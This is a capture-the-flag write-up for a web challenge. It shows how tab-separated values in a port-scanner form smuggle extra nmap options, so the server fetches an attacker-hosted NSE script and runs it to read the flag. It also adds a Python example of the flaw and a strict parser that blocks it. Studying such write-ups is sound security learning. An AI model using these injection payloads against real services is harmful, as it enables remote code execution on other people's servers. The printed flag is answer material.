CSC2023 - [Web] - SSCIT Web Scanner

You,CSC2023Web

Challenge Description

It's just an application to scan your IP with port. What can possibly go wrong?

Solution

Given an IP and port, the application scans that target using nmap.


nmap includes the Nmap Scripting Engine (NSE), which we can use to run nmap scripts.

Go to this site

Argument Injection

Using NSE scripts, we can upload our payload to the server and then run it.

First, I created a file with the following content:

os.execute('cat /flag-*')

I named it payload.nse

Run the HTTP server using the following command:

python3 -m http.server 8899

Payload 1

service=172.17.0.1:8899%09--script%09http-fetch%09--script-args%09http-fetch.destination=/tmp,http-fetch.url=/payload.nse

Getting requests on http server

Payload 2

service=172.17.0.1:8899%09--script%09/tmp/172.17.0.1/8899/payload.nse

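Why the `%09` (tab) separators work, and a strict parser that rejects both payloads. This is an added example, not the challenge's source code: the way the server builds its nmap command (`vulnerable_argv`), the `nmap -p` layout and all function names are assumptions.

```python
import ipaddress
import shlex
from urllib.parse import unquote

# The two `service` values from this writeup, as sent (URL-encoded).
PAYLOAD_1 = ("172.17.0.1:8899%09--script%09http-fetch%09--script-args%09"
             "http-fetch.destination=/tmp,http-fetch.url=/payload.nse")
PAYLOAD_2 = "172.17.0.1:8899%09--script%09/tmp/172.17.0.1/8899/payload.nse"


def vulnerable_argv(service: str) -> list[str]:
    """Assumed vulnerable shape: the decoded value is pasted into a command
    string that is split on whitespace, so each tab starts a new argument."""
    host, _, port = service.partition(":")
    return shlex.split(f"nmap -p {port} {host}")


def safe_argv(service: str) -> list[str]:
    """Parse <ipv4>:<port> strictly and build the argv list directly
    (no shell, no string splitting). Raises ValueError on anything else."""
    host, sep, port = service.partition(":")
    if not sep or not (port.isascii() and port.isdigit()):
        raise ValueError("expected <ipv4>:<port>")
    addr = ipaddress.IPv4Address(host)  # rejects whitespace, hostnames, options
    port_num = int(port)
    if not 1 <= port_num <= 65535:
        raise ValueError("port out of range")
    # Both values are re-serialised from parsed types, so neither can
    # begin with "-" or carry a separator character.
    return ["nmap", "-p", str(port_num), str(addr)]


def is_rejected(encoded_service: str) -> bool:
    """True if the strict parser refuses the (URL-encoded) form value."""
    try:
        safe_argv(unquote(encoded_service))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Injected options show up as separate argv entries in the assumed vulnerable form.
    print(vulnerable_argv(unquote(PAYLOAD_1)))
    print(is_rejected(PAYLOAD_1), is_rejected(PAYLOAD_2))
    print(safe_argv("172.17.0.1:8899"))
```

The resulting list should be passed to the process API as an argument vector (for example `subprocess.run(argv)` without `shell=True`), so no later step re-splits it.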

Flag

CSC{Inj3ct10ns_4re_s0_b4d}

Writeups 2023 © RootxRAN.